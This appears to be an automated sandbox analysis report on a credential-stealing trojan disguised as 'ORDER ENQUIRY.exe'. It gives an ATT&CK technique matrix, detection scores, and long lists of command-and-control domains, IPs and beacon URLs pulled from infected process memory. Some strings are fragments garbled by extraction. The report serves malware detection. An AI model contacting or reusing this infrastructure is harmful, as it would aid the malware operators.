Source: Yara match	File source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Shared Modules	1 DLL Side-Loading	612 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	612 Process Injection	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	213 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ORDER ENQUIRY.exe	51%	Virustotal		Browse
ORDER ENQUIRY.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeLogger
ORDER ENQUIRY.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.mksport-app.com	1%	Virustotal	Browse
raidsa.xyz	1%	Virustotal	Browse
www.os9user.com	0%	Virustotal	Browse
shops.myshopify.com	0%	Virustotal	Browse
www.horxncnt.xyz	0%	Virustotal	Browse
flywatchsecurity.com	1%	Virustotal	Browse
www.flywatchsecurity.com	0%	Virustotal	Browse
www.wergol.com	0%	Virustotal	Browse
www.cttlca.click	0%	Virustotal	Browse
www.raidsa.xyz	0%	Virustotal	Browse
www.manhuafeifei.xyz	0%	Virustotal	Browse
www.avai66.xyz	0%	Virustotal	Browse
www.valo.games	0%	Virustotal	Browse
www.21556934.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
http://www.flywatchsecurity.com	0%	Virustotal		Browse
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
http://www.bodgion.xyz/hy08/www.avai66.xyz	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.mksport-app.com	154.221.68.229	true	true	1%, Virustotal, Browse	unknown
raidsa.xyz	3.33.130.190	true	true	1%, Virustotal, Browse	unknown
www.os9user.com	199.59.243.227	true	true	0%, Virustotal, Browse	unknown
shops.myshopify.com	23.227.38.74	true	true	0%, Virustotal, Browse	unknown
www.horxncnt.xyz	154.197.185.220	true	true	0%, Virustotal, Browse	unknown
flywatchsecurity.com	151.101.0.119	true	true	1%, Virustotal, Browse	unknown
www.wergol.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.flywatchsecurity.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.cttlca.click	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.valo.games	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.manhuafeifei.xyz	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.21556934.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.raidsa.xyz	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.avai66.xyz	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Reputation
http://www.horxncnt.xyz/hy08/?GxlX=J+fUwLE1cqwAibtDCdy9vP1S8G5oesFXJDqwJASvo9tHD3nGP7GVc6KavM+iw+vNh4vC&DVRXbd=tXIxBhEhlzJLR	true	unknown
http://www.os9user.com/hy08/?GxlX=7jBziBoNeaZ0YBYCWuyuiMj/CYrZJe3GZSyGqEoVCgHfq7+BCveVTDnkVKPyAZoe4JtD&DVRXbd=tXIxBhEhlzJLR	true	unknown
http://www.wergol.com/hy08/?GxlX=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cM7klw0Rkk8&DVRXbd=tXIxBhEhlzJLR	true	unknown
http://www.raidsa.xyz/hy08/?GxlX=30efH6i7Pz0nBTvTyaS27TzcwE/B1ZxvPeuscSnkTZUQOLn/CwAUU0gdfCR3da34oWtV&DVRXbd=tXIxBhEhlzJLR	true	unknown
http://www.mksport-app.com/hy08/?GxlX=NioFYaTFIvMJJp+7ScZBWsfgKUzei2ToAwpis545Pph8LP+guwZTQ54AM67XLgRQsCTP&DVRXbd=tXIxBhEhlzJLR	true	unknown
http://www.flywatchsecurity.com/hy08/?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL4s8KZ+L&DVRXbd=tXIxBhEhlzJLR	true	unknown
www.avai66.xyz/hy08/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.bodgion.xyz/hy08/www.avai66.xyz	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://www.flywatchsecurity.com	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://word.office.comon	explorer.exe, 00000004.00000000.2114025669.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.manhuafeifei.xyz	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.hemcksqa.netReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.horxncnt.xyz/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cttlca.click/hy08/www.flywatchsecurity.com	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.flywatchsecurity.comReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.wergol.com/hy08/www.os9user.com	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.horxncnt.xyz	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.flywatchsecurity.com/hy08/www.21556934.com	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000004.00000000.2117240871.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4560565201.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.raidsa.xyz/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.yc23w.topReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cttlca.click/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.manhuafeifei.xyz/hy08/www.horxncnt.xyz	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.btcrenaissance.net/hy08/www.yc23w.top	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.os9user.comReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000004.00000002.4557463098.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100493467.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095675812.0000000009BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.btcrenaissance.netReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.micro	explorer.exe, 00000004.00000002.4555698304.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4555746089.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4555114227.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.os9user.com/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cheaplaptops.biz/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.raidsa.xyz	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.valo.games/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.avai66.xyz	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.valo.gamesReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.google.com	explorer.exe, 00000004.00000002.4565253332.00000000114CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4552234596.000000000529F000.00000004.10000000.00040000.00000000.sdmp	false		unknown
http://www.btcrenaissance.net	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.valo.games	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.avai66.xyz/hy08/www.cheaplaptops.biz	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.raidsa.xyz/hy08/www.manhuafeifei.xyz	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.mksport-app.comReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.mksport-app.com/hy08/www.raidsa.xyz	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.avai66.xyzReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.google.com	ORDER ENQUIRY.exe	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000004.00000002.4560565201.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2117240871.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.hemcksqa.net/hy08/j	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://wns.windows.com/)s	explorer.exe, 00000004.00000000.2114025669.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000004.00000003.3100426782.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2117735583.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4562642663.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.mksport-app.com/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.21556934.comReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.btcrenaissance.net/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.valo.games/hy08/www.bodgion.xyz	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.hemcksqa.net	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.wergol.com	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.bodgion.xyzReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.yc23w.top/hy08/www.hemcksqa.net	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cheaplaptops.biz/hy08/www.btcrenaissance.net	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.21556934.com/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.bodgion.xyz	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.wergol.com/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.raidsa.xyzReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.horxncnt.xyz/hy08/www.cttlca.click	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.wergol.comReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cttlca.clickReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.flywatchsecurity.com/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com	explorer.exe, 00000004.00000003.3100033957.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095675812.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4557514681.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.cloudflare.com/5xx-error-landing	explorer.exe, 00000004.00000002.4565253332.00000000114CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4552234596.000000000529F000.00000004.10000000.00040000.00000000.sdmp	false		unknown
http://www.hemcksqa.net/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.21556934.com/hy08/www.valo.games	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.horxncnt.xyzReferer:	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cttlca.click	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.yc23w.top/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.os9user.com	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.hemcksqa.net/hy08/A	explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000004.00000000.2111653112.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.21556934.com	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.avai66.xyz/hy08/	explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false		unknown
